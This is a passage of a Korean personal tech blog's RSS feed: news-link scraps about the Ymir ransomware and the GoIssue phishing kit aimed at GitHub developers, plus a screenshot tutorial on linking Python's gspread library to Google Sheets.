&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Threat Intelligence</category>
      <category>threat intelligence</category>
      <category>공격자</category>
      <category>사이버 위협</category>
      <category>오블완</category>
      <category>위협정보</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>티스토리챌린지</category>
      <category>해킹</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/69</guid>
      <comments>https://a2sembly.tistory.com/69#entry69comment</comments>
      <pubDate>Sun, 17 Nov 2024 23:37:44 +0900</pubDate>
    </item>
    <item>
      <title>랜섬웨어 이미르: Ymir ransomware</title>
      <link>https://a2sembly.tistory.com/68</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=134374&amp;amp;page=1&amp;amp;kind=1&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.boannews.com/media/view.asp?idx=134374&amp;amp;page=1&amp;amp;kind=1&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731756134612&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;대단히 은밀하고 비밀스러운 랜섬웨어 이미르, 타 조직과 파트너십 맺고 움직여&quot; data-og-description=&quot;새로운 랜섬웨어가 등장했다. 이름은 이미르(Ymir)로, 여러 가지 독특한 기능을 가지고 있어 관심을 끌고 있다. 이미르를 사용하는 공격자들은 먼저 파워셸을 통해 피해자의 시스템에 접근하여 &quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=134374&amp;amp;page=1&amp;amp;kind=1&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=134374&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bUp3A9/hyXwoJSMMS/ULqTikIPMrRpLaocHOazlk/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot;&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=134374&amp;amp;page=1&amp;amp;kind=1&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=134374&amp;amp;page=1&amp;amp;kind=1&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bUp3A9/hyXwoJSMMS/ULqTikIPMrRpLaocHOazlk/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;대단히 은밀하고 비밀스러운 랜섬웨어 이미르, 타 조직과 파트너십 맺고 움직여&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;새로운 랜섬웨어가 등장했다. 이름은 이미르(Ymir)로, 여러 가지 독특한 기능을 가지고 있어 관심을 끌고 있다. 이미르를 사용하는 공격자들은 먼저 파워셸을 통해 피해자의 시스템에 접근하여&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://thehackernews.com/2024/11/new-ymir-ransomware-exploits-memory-for.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://thehackernews.com/2024/11/new-ymir-ransomware-exploits-memory-for.html&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731756147995&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Kaspersky identifies new stealthy ransomware&quot; data-og-description=&quot;Kaspersky&amp;rsquo;s Global Emergency Response Team has identified a previously unseen ransomware strain in active use, deployed in an attack following the theft of employee credentials. The ransomware, dubbed &amp;ldquo;Ymir&amp;rdquo;, employs advanced stealth and encryption m&quot; data-og-host=&quot;www.kaspersky.com&quot; data-og-source-url=&quot;https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware&quot; data-og-url=&quot;https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.kaspersky.com/about/press-releases/kaspersky-identifies-new-stealthy-ransomware&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Kaspersky identifies new stealthy ransomware&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Kaspersky&amp;rsquo;s Global Emergency Response Team has identified a previously unseen ransomware strain in active use, deployed in an attack following the theft of employee credentials. The ransomware, dubbed &amp;ldquo;Ymir&amp;rdquo;, employs advanced stealth and encryption m&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.kaspersky.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>스크랩</category>
      <category>ymir</category>
      <category>오블완</category>
      <category>이미르</category>
      <category>티스토리챌린지</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/68</guid>
      <comments>https://a2sembly.tistory.com/68#entry68comment</comments>
      <pubDate>Sat, 16 Nov 2024 20:22:58 +0900</pubDate>
    </item>
    <item>
      <title>Python gspread로 구글 시트(Google Sheet) 연동하기</title>
      <link>https://a2sembly.tistory.com/67</link>
      <description>&lt;h2 data-ke-size=&quot;size26&quot;&gt;0. 프로젝트 생성&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;만약 프로젝트가 없다면 프로젝트를 생성합니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;477&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bnLbkK/btsKIO14j9S/wMIo4eidCxyIMOaWT9rFgK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bnLbkK/btsKIO14j9S/wMIo4eidCxyIMOaWT9rFgK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bnLbkK/btsKIO14j9S/wMIo4eidCxyIMOaWT9rFgK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbnLbkK%2FbtsKIO14j9S%2FwMIo4eidCxyIMOaWT9rFgK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;616&quot; height=&quot;477&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;477&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;1. Key 발급&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://console.cloud.google.com/hom&quot;&gt;https://console.cloud.google.com/home&lt;/a&gt; 에 접속한다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;494&quot; data-origin-height=&quot;425&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/umj8y/btsKKfc5WH8/yW7I2PluGIsXppqTQ3NqsK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/umj8y/btsKKfc5WH8/yW7I2PluGIsXppqTQ3NqsK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/umj8y/btsKKfc5WH8/yW7I2PluGIsXppqTQ3NqsK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fumj8y%2FbtsKKfc5WH8%2FyW7I2PluGIsXppqTQ3NqsK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;494&quot; height=&quot;425&quot; data-origin-width=&quot;494&quot; data-origin-height=&quot;425&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;그런 다음 API 개요로 이동한다.&lt;/li&gt;
&lt;li&gt;왼쪽 메뉴에 라이브러리로 이동&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;183&quot; data-origin-height=&quot;308&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/JQ3jq/btsKJLwIJQp/o2UDWDWWkZmwfKfs3qGOyK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/JQ3jq/btsKJLwIJQp/o2UDWDWWkZmwfKfs3qGOyK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/JQ3jq/btsKJLwIJQp/o2UDWDWWkZmwfKfs3qGOyK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJQ3jq%2FbtsKJLwIJQp%2Fo2UDWDWWkZmwfKfs3qGOyK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;183&quot; height=&quot;308&quot; data-origin-width=&quot;183&quot; data-origin-height=&quot;308&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;그런 다음 Google Drive API를 검색하여 설치한다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1165&quot; data-origin-height=&quot;343&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kYX14/btsKIDTWrcT/02HMpROQD8GysIvLMYGiRk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kYX14/btsKIDTWrcT/02HMpROQD8GysIvLMYGiRk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kYX14/btsKIDTWrcT/02HMpROQD8GysIvLMYGiRk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkYX14%2FbtsKIDTWrcT%2F02HMpROQD8GysIvLMYGiRk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1165&quot; height=&quot;343&quot; data-origin-width=&quot;1165&quot; data-origin-height=&quot;343&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;설치가 완료되었으면 관리로 들어간다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;238&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bf0hF8/btsKJxZPyIu/0QdrFdT7gHFMVLHv40vaPk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bf0hF8/btsKJxZPyIu/0QdrFdT7gHFMVLHv40vaPk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bf0hF8/btsKJxZPyIu/0QdrFdT7gHFMVLHv40vaPk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbf0hF8%2FbtsKJxZPyIu%2F0QdrFdT7gHFMVLHv40vaPk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;238&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;238&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;왼쪽 메뉴의 사용자 인증 정보로 들어간다. ( &lt;b&gt;사용자 인증 정보 만들기 클릭&lt;/b&gt; )&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;260&quot; data-origin-height=&quot;303&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wfFNg/btsKKEQ6m9c/YWVbVG3AQsT3l36pzqZf7k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wfFNg/btsKKEQ6m9c/YWVbVG3AQsT3l36pzqZf7k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wfFNg/btsKKEQ6m9c/YWVbVG3AQsT3l36pzqZf7k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwfFNg%2FbtsKKEQ6m9c%2FYWVbVG3AQsT3l36pzqZf7k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;260&quot; height=&quot;303&quot; data-origin-width=&quot;260&quot; data-origin-height=&quot;303&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;577&quot; data-origin-height=&quot;155&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/orEDW/btsKISKbypC/E5qxFHnrUhXSc0IxXVKpO1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/orEDW/btsKISKbypC/E5qxFHnrUhXSc0IxXVKpO1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/orEDW/btsKISKbypC/E5qxFHnrUhXSc0IxXVKpO1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2ForEDW%2FbtsKISKbypC%2FE5qxFHnrUhXSc0IxXVKpO1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;577&quot; height=&quot;155&quot; data-origin-width=&quot;577&quot; data-origin-height=&quot;155&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;아래 그럼 처럼 셋팅한다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;225&quot; data-origin-height=&quot;604&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cOFGgv/btsKKnIO0Bv/i9mctH3kmrAfN3vRuXf7RK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cOFGgv/btsKKnIO0Bv/i9mctH3kmrAfN3vRuXf7RK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cOFGgv/btsKKnIO0Bv/i9mctH3kmrAfN3vRuXf7RK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcOFGgv%2FbtsKKnIO0Bv%2Fi9mctH3kmrAfN3vRuXf7RK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;225&quot; height=&quot;604&quot; data-origin-width=&quot;225&quot; data-origin-height=&quot;604&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;562&quot; data-origin-height=&quot;480&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b4rhIt/btsKJFJ8dR1/ld9Uuwa5PcNFBKuY5U59vk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b4rhIt/btsKJFJ8dR1/ld9Uuwa5PcNFBKuY5U59vk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b4rhIt/btsKJFJ8dR1/ld9Uuwa5PcNFBKuY5U59vk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb4rhIt%2FbtsKJFJ8dR1%2Fld9Uuwa5PcNFBKuY5U59vk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;562&quot; height=&quot;480&quot; data-origin-width=&quot;562&quot; data-origin-height=&quot;480&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;그런 다음 Google Sheet API를 검색하여 설치한다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;870&quot; data-origin-height=&quot;334&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ADyP8/btsKJy5w1UI/lnNZ9rkgugOuPmzilzHG0K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ADyP8/btsKJy5w1UI/lnNZ9rkgugOuPmzilzHG0K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ADyP8/btsKJy5w1UI/lnNZ9rkgugOuPmzilzHG0K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FADyP8%2FbtsKJy5w1UI%2FlnNZ9rkgugOuPmzilzHG0K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;870&quot; height=&quot;334&quot; data-origin-width=&quot;870&quot; data-origin-height=&quot;334&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;아래 명령어를 통해 모듈을 설치합니다.
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;pip install gspread&lt;/li&gt;
&lt;li&gt;pip install oauth2client&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&lt;a href=&quot;http://docs.google.com/spreadsheets&quot;&gt;docs.google.com/spreadsheets&lt;/a&gt; 설정&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;문서 생성 후 상단 공유 버튼 클릭&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;153&quot; data-origin-height=&quot;52&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c8439u/btsKJykb38g/23fWRcaYOUoddrRs6orPEk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c8439u/btsKJykb38g/23fWRcaYOUoddrRs6orPEk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c8439u/btsKJykb38g/23fWRcaYOUoddrRs6orPEk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc8439u%2FbtsKJykb38g%2F23fWRcaYOUoddrRs6orPEk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;153&quot; height=&quot;52&quot; data-origin-width=&quot;153&quot; data-origin-height=&quot;52&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;링크가 있는 모든 사용자로 변경&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;615&quot; data-origin-height=&quot;226&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/caT6dz/btsKKna0Y4v/YBXKCjuhGV1UyQKOzOaPIK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/caT6dz/btsKKna0Y4v/YBXKCjuhGV1UyQKOzOaPIK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/caT6dz/btsKKna0Y4v/YBXKCjuhGV1UyQKOzOaPIK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcaT6dz%2FbtsKKna0Y4v%2FYBXKCjuhGV1UyQKOzOaPIK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;615&quot; height=&quot;226&quot; data-origin-width=&quot;615&quot; data-origin-height=&quot;226&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;추가적으로 링크를 복사해 gspread로 구글 시트를 제어할 수 있습니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>공부/Programming</category>
      <category>google</category>
      <category>gspread</category>
      <category>python</category>
      <category>xlsx</category>
      <category>엑셀</category>
      <category>오블완</category>
      <category>티스토리챌린지</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/67</guid>
      <comments>https://a2sembly.tistory.com/67#entry67comment</comments>
      <pubDate>Fri, 15 Nov 2024 00:27:29 +0900</pubDate>
    </item>
    <item>
      <title>개발자들을 노리는 고급 피싱 도구, 고이슈(GoIssue)</title>
      <link>https://a2sembly.tistory.com/66</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://m.boannews.com/html/detail.html?mtype=2&amp;amp;tab_type=D&amp;amp;idx=134299&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://m.boannews.com/html/detail.html?mtype=2&amp;amp;tab_type=D&amp;amp;idx=134299&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731508213698&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;깃허브에서 활동하는 개발자들을 노리는 고급 피싱 도구, 고이슈&quot; data-og-description=&quot;새로운 피싱 도구가 사이버 범죄자들 사이에서 유행하기 시작했다. 이 도구는 깃허브(GitHub)에서 활동하는 개발자들을 집중적으로 노리는 피싱 메일 키트로, 이름은 고이슈(GoIssue)다. 깃허브 프&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=2&amp;amp;tab_type=D&amp;amp;idx=134299&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=134299&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cJejBF/hyXzOzFnsF/BftmWX4W4kai54PjEnDyH0/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot;&gt;&lt;a href=&quot;https://m.boannews.com/html/detail.html?mtype=2&amp;amp;tab_type=D&amp;amp;idx=134299&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=2&amp;amp;tab_type=D&amp;amp;idx=134299&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cJejBF/hyXzOzFnsF/BftmWX4W4kai54PjEnDyH0/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;깃허브에서 활동하는 개발자들을 노리는 고급 피싱 도구, 고이슈&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;새로운 피싱 도구가 사이버 범죄자들 사이에서 유행하기 시작했다. 이 도구는 깃허브(GitHub)에서 활동하는 개발자들을 집중적으로 노리는 피싱 메일 키트로, 이름은 고이슈(GoIssue)다. 깃허브 프&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;m.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=134288&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=134288&lt;/a&gt;&lt;/p&gt;
